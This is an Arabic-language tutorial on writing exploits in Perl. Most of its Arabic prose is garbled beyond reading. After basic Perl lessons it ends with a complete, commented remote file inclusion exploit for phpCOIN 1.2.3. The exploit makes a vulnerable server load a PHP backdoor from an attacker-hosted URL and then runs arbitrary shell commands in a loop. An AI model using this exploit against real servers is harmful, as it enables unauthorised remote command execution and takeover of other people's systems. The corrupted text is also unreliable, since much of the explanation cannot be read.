Perl Writing Exploits - TechGig.com

www.t0010.com

Perl Writing Exploits

www.t0010.com

Perl Writing Exploits

 ‫ ا ا  ا‬

 !" ‫ اق ظ‬ AlhambA ‫ ب‬.‫ ا‬/ ,‫*) ت ا‬+, http://www.sniper-sa.com/forums

)  ‫"! ا‬

‫‪www.t0010.com‬‬

‫‪Perl Writing Exploits‬‬

‫‪ ::‬ا ‪::‬‬ ‫ال هـ! ـ ‪#‬ـ‪"  ,‬ـ! ـوره ‪o N‬ـ ا‪Y‬ـ&ص‬ ‫و] آ ‪S pq‬ا ‪r^ !" ,‬ـ ت اـ‪ RIq‬واـم أ‪t‬ـ ‪p‬‬ ‫ال ^‪@ A‬م ‪ u e‬آ‪ M‬أ‪ Zq‬ا ـ‪ ^ M1‬ـ ً ‪," ،‬ـ!‬ ‫‪  R%q‬ت ا‪ o‬ا‪>y‬ى ‪I" ،‬ـ‪ M‬ـ و‪,‬ـ ـ‪z‬ات ‪e‬ـ?‬ ‫ا‪>$‬ى ‪.‬‬ ‫"ــ ل " ــة ــ? ‪,eq‬ــ "‪,‬ــ! ‪#‬ــ‪  ,‬اــ ‪ l N‬و‪#‬ــ‪ ,‬‬ ‫ا‪ N #$‬ل‪.‬‬ ‫ــ ذا ^‪ I‬ــ‪ K‬ا‪#‬ــ =ل ا‪f‬ــات ‪S‬ــ ل ‪e‬ــ? {هــ ؟‬ ‫‪ ,q$‬ا[ة ^‪," K I‬ـ ا‪#$‬ـ =ل ‪YS‬ـ‪[ A‬ـا! ‪%70‬‬ ‫^‪ S K I‬ل‬ ‫وا‪S KA‬ـ ن اآ‪f‬ـ ا‪I,‬ـ @ ـ رون هـ‪b‬ة ا ـ ‪e‬ـ? {هـ ‬ ‫‪ KAS‬ا‪  ,# ,q‬ا ‪k‬ـ و‪#‬ـ‪  ,‬ا ـ‪ M‬وهـ! آ‪%‬ـء‬ ‫‪ ، MN S‬و^‪ zoY‬ا‪. aj " eAS MN‬‬ ‫ آـ ن اه  ـ إ ‪o‬ـ د ا‪f‬ـات "‪,‬ـ‪b‬ا ا…ـع اـ& ƒ‬ ‫ ‪b,S , I‬ة ا  ‪.‬‬

www.t0010.com

Perl Writing Exploits

: ‫ ت "!  ال‬# #y‫ا‬ lk  M  ‫ † "! ال ^ ج‬qS b%Y !I ActiveStates's perl http://www.activestate.us

L]‫ا ا‬b‫ ? ه‬a [

!&q ‫وا ‹ ً  ر‬ DzSofts Perl‫ا ا ر‬b‫ @م ه‬#‫ Œ@& ً ا‬q‫ا‬ www.dzsoft.com

L]‫ا ا‬b‫ ه‬u e ‘o^ ‘I%‫ @م ا‬#‫او ا‬

"perl Editor "Mko‫ "! ا‬K ‫ اآ‬# Y^ l ‫او اذا‬ .pl ‫ن‬I ‫ "! ال‬o qS ‫وا اد‬  o‫ ا‬e ” !‫ † "! ال وه‬qS ‫ اول‬K IY "Hello World ‫ة‬,1‫ا‬ :‫آد‬

#!/usr/bin/perl -w print "Hello World\n";

filename.pl l#$‫ ا‬b,S aZ%[‫ا‬ : ‫د‬I‫Œح ا‬ ‫ ل‬S † qS S I  ‫ اا‬#!/usr/bin/perl MN A ً e‫ و‬. šr@‫ ه    šآ ? ا‬-w k ‫ ا‬q r>‫ أ‬K^ 

www.t0010.com

Perl Writing Exploits

›]^ ?e ‫ ء "! ) ; (  @ ال‬r>‫ون ا‬S M1 ‫و‬ . œ@‫ا ا‬b‫ ه‬u e ‫ااءة‬  k r#

"\n"

a ‫ت ا>ى‬$ [ ‫ة‬b‫وه‬ \n \r \t \f \b \v \e \a \L \l \U \u

NewLine Return Tab Form Feed Backspace Vertical Tab Escape Alarm Lowercase All Lowercase Next Uppercase All Uppercase First

>‫ ل ا‬f #!/usr/bin/perl -w print "Hello\tWorld\n\a";

‫ن‬I^ ‫ ]! ا  ت  ات ا‬S Mf ‫ "! ال‬b‫وآ‬ ‫&ص أو أر] م‬q ‫? ^ ى‬I ‫ و‬،  ]¡ ‫ أو‬j‫دا‬ "$".‫Œ رة‬$ S ‫ف‬N^‫و‬ ! ‫ ل ا‬f‫Œ ه ا‬ #!/usr/bin/perl -w $Hello = "Hello World\n"; print $Hello;

www.t0010.com

Perl Writing Exploits

!" ‫ة‬fIS ‫ @م‬A^ !‫ @ام )' '( وه‬#‫ ا‬YI ‫و‬ ‫" ت‬%&‫ا‬ ¥q ‫ آـ‬,Z^ !," '\n' Me ?I $ ,YS ‫ق‬%‫ا‬ DOT ‫ @ام‬# S ¥q L ¥q ›‹^ ‫ ان‬YI ‹ ‫وا‬ #!/usr/bin/perl -w #"red", banana =>"yellow"); print $color{apple}."\n".$color{banana};

www.t0010.com

Perl Writing Exploits

: Conditionals ‫ ل‬f b>šq ,,% ‫ط‬1‫أدوات ا‬ ‫ ك‬# Lj k { ‫ إذا آ ن‬، ‫ ح‬%^ ,S ‫ة‬oŒ [‫ أ‬k‫ و‬ Lj k ‫ [ واذا  زال‬%^ M‫šآ‬S Lj k ‫ وإذا آ ن‬، ‫ة‬o1‫ا‬ ، L1 ? M‫ šآ‬MZ#‫ و‬q ¶ ‫ وا[ة‬M‫ آ‬S .‫ة‬o1‫ ك ا‬S aYrS ‫وإذا ا ¾ت‬ :&‫ا‬ if ( Logical ) { some command }

‫ ل‬f #!/usr/bin/perl -w $i = 1; if($i ==1) { $i++; #Increment 1 print $i . "\n"; #Print's 2 because the variable $i's condition was true #If $i was any other '#' it wouldnt print anything. }

i  ‫ › ا‬N S ‫ ل اء‬f‫ا‬ i=1  ‫  اذا آ ن ا‬e r 1 ! ‫ ا‬rA‫ "! ا‬l¶ † q‫@ج ? ا‬# ‫ { ذ‬، M>‫اد‬ 2  ] Nr ‫ و‬1 a ›Z l¶ ‫ ا وف‬string !" ‫ط‬1‫ @م ادوات ا‬A^ ‫? ان‬I ‫و‬ &Y‫ا‬

www.t0010.com

Perl Writing Exploits

:‫ ل‬f #!/usr/bin/perl -w $i = Hello; if($i eq 'Hello') { print "Hello!\n"; } else { print "The variable (i) doesn't equal the correct string!\n"; }

. ‫ط‬1‫ ¨ ا‬l ‫ ه اذا‬YN Else " ‫ ا‬M#=A‫? ا‬S q‫ا ر‬ eq equalty ‫ وي‬A

NE INEQUALTY ‫ وي‬A $ LT LESS THEN ? t‫ا‬ GT GREATER THEN ? ‫اآ‬ LE LESS THEN OR EQUAL ‫ وي‬A ‫ ? او‬t‫ا‬ GE GREATER THEN OR EQUQL ‫ وي‬A ‫اآ ? او‬

: User Input ‫ @م‬A‫د> ل ? >=ل ا‬²‫ا‬ ‫ @م‬A‫ ? ا‬K r ‫ة‬f  ‫ =ل‬#‫ ا‬S ‫ آ‬Ye ‫ @م‬A ‫و‬ ‫ =ل‬#$‫ ا‬M1  ً=f ، ¥q ‫إد> ل ] أو‬ .‘ N M 1^ !I ‫ ل‬N #$‫ ا‬S IS ‫ @م‬A‫"م ا‬

www.t0010.com

Perl Writing Exploits

:‫ة ”ق =د> ل‬e ‫ ك‬Y‫وه‬

STDIN Method ً$‫أو‬ ‫ ت‬q   ‫  اد> ل‬e !‫ه‬ ‫ ل‬f #!/usr/bin/perl -w #STDIN Method print "Hello my name is AlhambA, what is your name?: "; $L1 = ; chomp $L1; print "Nice to meet you $L1!\n";

NS ! ‫   وف ا‬o‫ ا‬rA‫ف ا‬b S !YN^ :chomp . ‫ا‬

: ARGV@ Method !‫ =د> ل ه‬q f‫  ا‬r‫ا‬  ‫ د‬e "%& pA ‫ة‬b‫ه‬ ‫ > رات‬u e ‫ @م‬A‫ ا‬L‹^ ‫ ان‬YI ‫ة‬b,S : ARGV@ :‫ ل‬f perl sploit.pl www.somesite.com /forums/ 1

‫ل‬N^ ‫? ان‬I ‫ة ا@ رات‬b‫ ه‬Lk ( perl sploit.pl ) ‫ا‬e 

www.t0010.com

Perl Writing Exploits

ARGV@ r S ‫ @م ا@ رات‬Aq  ‫و] ت‬$‫ ا‬K {‫"! ا‬ #!/usr/bin/perl -w if(@ARGV !=2) { print "Usage: perl $0 \n"; exit; } ($name, $num) = @ARGV; print "Hello $name & your number was: $num!\n";

b%Y‫ا‬file.pl › ‫ ا‬l#‫ ا‬b>¾  ‫ا ا‬b‫ @م ه‬A $0 . k@‫  ت ا‬N‫  "! ا‬e ” l ‫[  ً و‬

uA^ ! ‫ ا‬module ‫ @ام‬# S f f‫  ا‬r‫ا‬ :GetOpt #!/usr/bin/perl -w #GetOpt STD module use Getopt::Std; getopts (":b:n:", \%args); if (defined $args{n}) { $n1 = $args{n}; } if (defined $args{b}) { $n2 = $args{b}; } if (!defined $args{n} or !defined $args{b}){ print "Usage: perl $0 -n Name -b Number\n"; exit; } print "Hello $n1!\n"; print "Your number was: $n2\n"; print "Visit www.SnIpEr-SA.com today!\n\n";

k ‫ ا‬KN& S R Getopt ‘ A‫ ا‬M ‫ ء اد‬e #‫ ا‬Ã f‫ ا‬rA‫"! ا‬

www.t0010.com

Perl Writing Exploits

‫ @ام‬#‫ وا‬، b,-n- ‫=م‬ey‫ ا‬, getopts LS‫ اا‬rA‫و"! ا‬ %argsl,Y z@  ‫ ش‬,‫ا‬ n- ‫=م‬N‫د ا‬k ‫ ل اذا آ ن‬Y‫ ه‬R @‫ ا‬rA‫و"! ا‬ ، n1 ‫  ت "! ا‬N‫ن ا‬z> ‫ دس‬A‫ ا‬rA‫"! ا‬ .‫د‬k n-‫=م‬N‫ اذا آ ن ا‬$‫ ا‬$‫ا ا‬b‫ ه‬u‫ ا‬M> ? b-‫=م‬N‫ ا‬L ‫!ء‬1‫ ا‬R%q‫و‬ { ‫ط اذا آ ن‬1‫

د ا‬Y‫ ه‬1e ‫ ا دي‬rA‫و"! ا‬ ‫=م‬ey‫د ? ا‬k .aĔ > ‫ وا[ة‬a [ !" $‫ ا‬j t , ‫آ‬: or ‫ن‬I Ye y‫ ا‬exit  N  S † q‫ و  ¨ ا‬M># !" !] ‫ ا‬Lr ‫ و‬، ‫ ا@ رج‬u‫ ا‬z%A" ?"N ?=N‫ا‬ .‫ ل‬f‫ا‬ GetOpt" ‫ ل‬N # S Y   ‹%‫  ا‬r‫ن ا‬I #‫و‬ module ‫ @ام‬#$‫ ا‬M,# o qS ‫ن‬I ‫ ان‬Ko

: Loop  ‫ر آد‬I  % ‫ار ه‬I ‫ا‬ !" eo !," ، ‫ ااءة‬M,# ," ‫د‬I‫ ]اءة ا‬YI

. ‫د‬I‫ا ا‬b‫ه‬ #!/usr/bin/perl -w #Loop Tutorial #www.SnIpEr-SA.com #Join Us TODAY! ################################## #FULLY Commented# ################################## #While Loops #Format # while (Comparison) {

www.t0010.com

Perl Writing Exploits

# Action } #While loops will loop while the comparison is true, if it changes to false, it will no longer continue to loop through its set of action(s). $i = 1; while($i ‫ ك دوال‬Y‫ وه‬%1  S  ƒA M ‫ا اد‬b‫ه‬ ‫ ”ق‬b‫وآ‬ !‫اوال ه‬ md5($data,...) md5_hex($data,...) md5_base64($data,...)

md5($data,...) MI1‫ه "! ا‬N^ l¶ MD5 digest KA ^ ‫ة اا‬b‫ه‬ .p S 16 ,” binary !j Yf‫ا‬ md5_hex($data,...) 1e ‫ دس‬A‫ ا‬MI1‫ ا‬N^ ?I ¨S A‫ ا‬R%q 32 ,”hexadecimal ‫ن‬I ‫ا ى‬ 'a'..'f'.‫و‬0'..'9' md5_base64($data,...) ,” %1‫ ا‬base64 MI1‫ ا‬N^ ?I ¨S A‫ ا‬R%q 22 ‫ن‬I ‫ا ى‬ '/'.‫' و‬+' ‫'و‬9'..'0' ‫' و‬a'..'z'‫'و‬A'..'Z' :‫ ل‬f use Digest::MD5 qw(md5_hex); print "Digest is ", md5_hex("foobarbaz"), "\n";

‫ا ا@ج‬b‫وه‬ Digest is 6df23dc03f9b54cc38a0fc1483df6e21

www.t0010.com

Perl Writing Exploits

Digest::MD5 ?e ‫œ ث‬S‫ا اا‬b‫ه‬ http://search.cpan.org/~gaas/Digest-MD5-2.36/MD5.pm

Y,  GET K r ‫د‬Nq ‫ ت‬q S ‫ة‬e ] u e GET K ” S ‫م‬Y# ‫ ل‬f‫ا ا‬b‫"! ه‬ LWP UserAgentM ‫ اد‬L ," ,Y z@^‫ و‬Md5 #!/usr/bin/perl # Md5 Database Filler # # Version 1.0, Add Word Manually # # www.SnIpEr-SA.com # # Modules needed : LWP (User Agent), Digest (MD5) # # Download + INSTALL md5 digest module # use LWP::UserAgent; # Calling our LWP Useragent module use Digest::MD5 qw(md5_hex); # Calling our Digest MD5 module (Install {if you need it}) $brow = LWP::UserAgent->new; # Our new useragent defined under the variable $brow while(1) { # Just a simple while loop that will run the program continously instead of just 1 time print "Word to add: "; $var = ; chomp ($var); $seek = "http://md5.rednoize.com/?q=$var&b=MD5Search"; $brow->get( $seek ) or die "Failed to Send GET request!/n"; print "$var" . " : " . md5_hex("$var") . " was added to database " . "\n"; } # End of the while loop # To test if it worked go to http://md5.rednoize.com/ and search your md5(hex) hash given to you # It should crack :) # This was a simple example of a get request executed on a server

www.t0010.com

Perl Writing Exploits

LWP (User M‫ ء اد ــ‬e ‫ــ‬#‫ إ‬l ‫ــ ل ــ‬f‫ا ا‬b‫" ـ! ه ـ‬ .? ‫ـ‬f‫ و ا‬LS A‫ اـ‬rA‫"ـ! اـ‬Agent), Digest (MD5) !" ,N…‫ ة وو‬k useragent Me L# ‫ ا‬rA‫و"! ا‬ $brow . ‫ا‬ .!j ,q $ ‫ار‬I^ Me ! ‫وا‬ ‫ـ ت‬q ‫ـة ا‬e ] œ‫ـ‬S‫ـان را‬Ye ‫ـف‬N $seek ‫و"ـ! ا ـ‬ .‫ـة‬e ‫ "ـ! ا‬a‫ي اد> ـ‬b‫ اـ‬l#$‫ن ا‬z@# Y‫ ه‬urN‫ا‬ u‫ ـ‬e get K‫ ـ‬r‫ ا‬b%Y‫ـ‬# ƒ%&‫ ا ـ ! ا ـ‬rA‫و"! ا‬ K‫ ” ــ‬S š‫ــ‬r> ‫ واذا آــ ن [ــث‬$seek ‫ــف‬N‫ا ــ ا‬ šr@‫  ا‬#‫ ر‬M## b‫ وآــ‬a‫ي اد> ــ‬b‫ اــ‬l‫ــ‬#$‫ــ ا‬e ” l ‫>ــ ــ‬$‫و"ــ! ا‬ . RI,‫ا ا‬S %1 ‫ا‬ L]‫ ا‬u‫ ا‬K‫ اذه‬l#$‫واذا ارت ان ^ šآ ? ا… " ا‬ http://md5.rednoize.com/

‫ ش‬,‫ ا‬L ‘‫ ا‬#‫ و‬l#$‫? ا‬e à S‫و‬

Sockets

www.t0010.com

Perl Writing Exploits

IO M‫ـ ت  د ـ‬# #$‫ ا‬b> Y# ‫ء‬zo‫ا ا‬b‫ "! ه‬RS ‫ا‬ Socket INET‫( وهـ‬Input/Output) ‫>ـاج‬$‫د>ـ ل وا‬$‫ا‬ ‫ =ات‬#‫ @م "! ا‬A ‫و‬

IO Socket INET module RS ‫@م ا‬A^‫و‬، ‫ ء‬1qÌ  e % ‫ ا‬t YN‫ ا‬z,o  AF_INET ?‫او‬ ‫ ل‬f‫ا ا‬b‫"! ه‬ 80 ‫ ارت‬u e ip u e ‫œ =^& ل‬AS R ‫ ء‬1Y# #!/usr/bin/perl use IO::Socket; # M ‫ اد‬ue A IO Socket print "An IP to connect to: "; $ip = ;#‘‫اآ‬b‫! "! ا‬S ‫ن ا  اي‬z@# chomp($ip); $i=1; while($i new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"Couldn't connect!\n"; #Proto or Protocol (TCP/UDP) Y@ #‫ ا‬Y‫ ه‬tcp #PeerAddr or Peer Address M ‫@م‬A^ ip print "Connected!\n"; $i++; }

SQL injection exploits !" MN A^ M ‫ا اد‬b‫ه‬ ‫ ن‬k‫ ? ا و‬I  b‫وآ‬ . ¨" Sockets ?e ‫ ك آ ب ث‬Y‫وه‬

www.t0010.com

Perl Writing Exploits

Writing an Exploit (RFI (Remote File Include) u e ‫ن‬I # !‫وه‬ phpCOIN 1.2.3 .† qS !" ‫ة‬f‫ا‬ http://milw0rm.com/exploits/2254 www.site.com/coin_includes/constants.php?_CCFG[_PKG_PATH_I NCL]=SHELL?&cmd=COMMAND

R ," ‫ آد‬M‫ آ‬l,"‫د ا‬I‫ ا‬l,%^ !I aA^ l^ ‫ن‬Î‫  ا‬e KNt Y‫ { وا…ƒ ه‬," ‫ة‬I% u‫د ا‬I‫ ا‬ÏAq‫ا‬ #!/usr/bin/perl # http://milw0rm.com/exploits/2254 # # phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability # # Vulnerability found by TimQ # # Coded Exploit By Warpboy # use LWP::UserAgent; # We call our module #Store our user inputted information into variables # [=&‫ @  ر ا‬,@ Aq u ‫ف ا ات ا>  ا‬NY# ‫ ل‬N #$ S $site = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shellsite) { usg() # If the Url is invalid jump to the usg subrountine ‫اذا‬ b%Y# ƒ t ‫ آ ن‬usg subrountine ‫ =ل‬#$‫ ا‬M%#‫ "! ا‬L]‫وا‬ M 1# ‫ط‬1‫ ذ ا‬NS l¶ } header(); # Run through contents in the header subrountine b‫ وآ‬header subrountine ‫ء‬zo‫ "! ا‬b%Y# ‫ون Œط‬S ue A # ‫ =ل‬#$‫ ا‬M%#‫ا‬

www.t0010.com

Perl Writing Exploits

#---------------------------------------------------------# Some loops to give us the ability to continue to use more than one command on the server. # Without these we would have to re-start the exploit for each command # "A‫ ا‬u‫ ء اوا ا‬re‫ ار "! ا‬#$‫ ا‬Lr # ‫ ب‬r#‫ا‬S b%Y^ ‫ ء‬r>$‫ ا‬u [‫ † و‬q‫ ا‬b%Y^ Ye œ" [‫ ا وا‬R‫و‬ !" Y‫ =ل ? ا‹ر‘ ا>ل ه‬#$‫ ا‬b%Y^ !‫ ار آ‬# S  ‫ ا‬while Y e Y‫ وه‬while() == while(1) b%Y^ ‫اي‬ ‫ اررررر‬# S while() { print "[shell] \$"; while() # Recognize STDIN as a user input method, while() basically states that while your taking user input for the command, do the following. { # ‫ه‬b%Y^ ‫وا ااد‬$‫ ا‬Y‫ ه‬M>Y# $cmd=$_; #@_ :the argument passed to sub routine chomp($cmd); #Chomps the newline off the user inputted command #--------------------------------------------------------# Y "N Ye LWP Useragent module % Aq ‫د‬I‫ا ? ا‬b,S ^= #‫ ا‬,Y MN^ !I‫  و‬N%‫‘ ا‬f‫? ا‬ $xpl = LWP::UserAgent->new() or die; #Defines the variable $xpl as a new useragent $req = HTTP::Request>new(GET=>$site.'/coin_includes/constants.php?_CCFG[ _PKG_PATH_INCL]='.$shellsite.'?&'.$shellcmd.'='.$cmd)o r die "\n\n Failed to Connect, Try again!\n"; #K r‫ف ا‬N# get ‫ ا& ب‬L]‫ ا‬u‫ة ا‬f‫ ا‬M# ‫و‬ # ‫ ا‬$req K r‫ ا‬b%Y get L]‫ @م اد> ل ا‬A‫ ا‬u e‫و‬  ‫ ا& ب "! ا‬$site .‫ة‬f‫ ا‬L]‫ ا‬u e ¨r l¶ #$shellsite where the php backdoor is located, is the $shellcmd (php shell command variable) and $cmd variable which was the user #$shellcmd inputted command to execute on the server with the php backdoor. The final url

www.t0010.com

Perl Writing Exploits

# Would look like www.site.com/coin_includes/constants.php?_CCFG[_PKG _PATH_INCL]=SHELL?&cmd=COMMAND # # l ‫ وا[ و‬MIŒ !" ‫ د†  ات‬MN # ‘b‫ ه‬a #=A‫ا‬  ‫ "! ا‬,o‫ د‬$req $res = $xpl->request($req); # ‫ ا‬$res K r‫ ا‬b%Y get ? Lk A# †‫وا ي ا‬ K r‫ ا‬get  ‫ن "! ا‬z@ ‫ و‬$info # The response of the server to the GET request we sent is stored in the $info variable # K r‫ ا@ دم ? ا‬Ko A# get  ‫ "! ا‬,qz@ ‫ و‬, # ‫و‬ $info $info = $res->content; $info =~ tr/[\n]/[ê]/; #---------------------------------------------------------# ? ‫ دة‬N‫ ا‬Y    @^ u ‫وط ا‬1‫ ? ا‬eo ‘b‫ه‬ K r‫š ا‬r>‫ ا‬get r> ‫ @م او‬A‫ ? اد> ل ا‬r@‫=ً اذا آ ن ا‬f !" r> Y ‫= ل‬f L]‫ "! ا‬r@‫ "! او ا‬r@‫ او ا‬$‫"! ا‬ aS Y] ‫ي‬b‫ ا‬r@‫" ا‬N M,A‫ن ? ا‬I uI ‫^& ل‬$‫ا‬ #Simple conditional if (!$cmd) { print "\nEnter a Command\n\n"; $info =""; } #Tests to see if there was a connection failure or the command failed #šr> $‫š او ا‬r> ‫^& ل‬$‫ @  اذا آ ن ا‬Y‫ه‬ elsif ($info =~/failed to open stream: HTTP request failed!/ || $info =~/: Cannot execute a blank command in /) { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n"; exit; } # Another ElseIf, this is used incase the command is invalid like if you typed "asdfjasdf" as a command # Y‫ ه‬ElseIf =f   t { ‫وا‬$‫ ا‬pN” ‫" اذا‬asdfjasdf" elsif ($info =~/^.Warning/) { print "\nInvalid Command\n\n";

www.t0010.com

Perl Writing Exploits

}; #---------------------------------------------------------------# !," ‫ =ل‬#=   ‫ او …و‬# #‫د ا‬I‫‘ ? ا‬r@‫‘ ا‬b‫ه‬ r‫‘ ا‬f‫دة " ا‬k ‫ اذا آ ن‬L]  † q‫^ @ آد ا‬  e # b ^" ‫ ث   ى‬# ‫ د‬N ‫" اذا آ ن ا ى‬Warning" l¶ ‫ † @ج‬q‫ ا‬exits !YN^ u ‫‘ " ا‬f‫ ا‬k^$ ?N‫ ا‬L]‫ا‬ if($info =~ /(.+).Warning.(.+).Warning/) { $final = $1; $final=~ tr/[ê]/[\n]/; print "\n$final\n"; last; } #---------------------------------------------------------------#‘b‫ =ل وه‬#$‫ ا‬u e ‫

ي‬lA‫ا ا‬b‫ ه‬else MI !‫ه‬ MI  S A‫وط ا‬1‫ا‬ else { print "[shell] \$"; } # end of else } # end of while() } # end of while last; #Sub-Rountines #The end of the code is our sub rountine "header" used earlier in the exploit sub header() { print q{ ++++++++++++++++++++++++++++++++++++ ++++++++++ phpCOIN 1.2.3 -- Remote Include Exploit Vulnerablity found by: TimQ Exploit coded by: Warpboy Original PoC: http://milw0rm.com/exploits/2254 ++++++++++++++++++++++++++++++++++++ ++++++++++ }

www.t0010.com

Perl Writing Exploits

} #-----------------------------------------------------------#This is just our "usg" sub-rountine and a simple exit if all the code is bypassed due to errors ect sub usg() { header(); print q{ ==================================== ================================== Usage: perl sploit.pl - Path to site exp. www.site.com - Path to shell exp. www.evilhost.com/shell.txt - Command variable for php shell Example: perl C:\sploit.pl http://www.site.com/phpCOIN/ ==================================== =================================== }; exit(); } #-----------------------------------------------------------

www.t0010.com

Perl Writing Exploits

 ,Y‫ا‬ K{ ,Ó !" ‫ ء‬e‫ ا‬$‫ ا‬lIY ‘kq  Ô‫ ور[ ا‬lI e ‫=م‬A‫وا‬ AlhambA l‫ا>آ‬ :M ‫ا‬ [email protected] [email protected]

‫ "!  ال‬L# ‫و‬ http://www.cpan.org http://www.securitydb.org/forum/ http://www.programmingtutorials.com/perl.aspx http://www.pageresource.com/cgirec/index2.htm http://www.cclabs.missouri.edu/thing...erlcourse.html http://www.ebb.org/PickingUpPerl/pickingUpPerl_toc.html http://vsbabu.org/tutorials/perl/ http://www.freeprogrammingresources.com/perl.html http://www.thescripts.com/serverside...uru/page0.html http://www.perl.com/pub/a/2002/08/20/perlandlwp.html http://www.perl.com http://www.perlmonks.org/index.pl?node=Tutorials www.google.com

Ô  S l^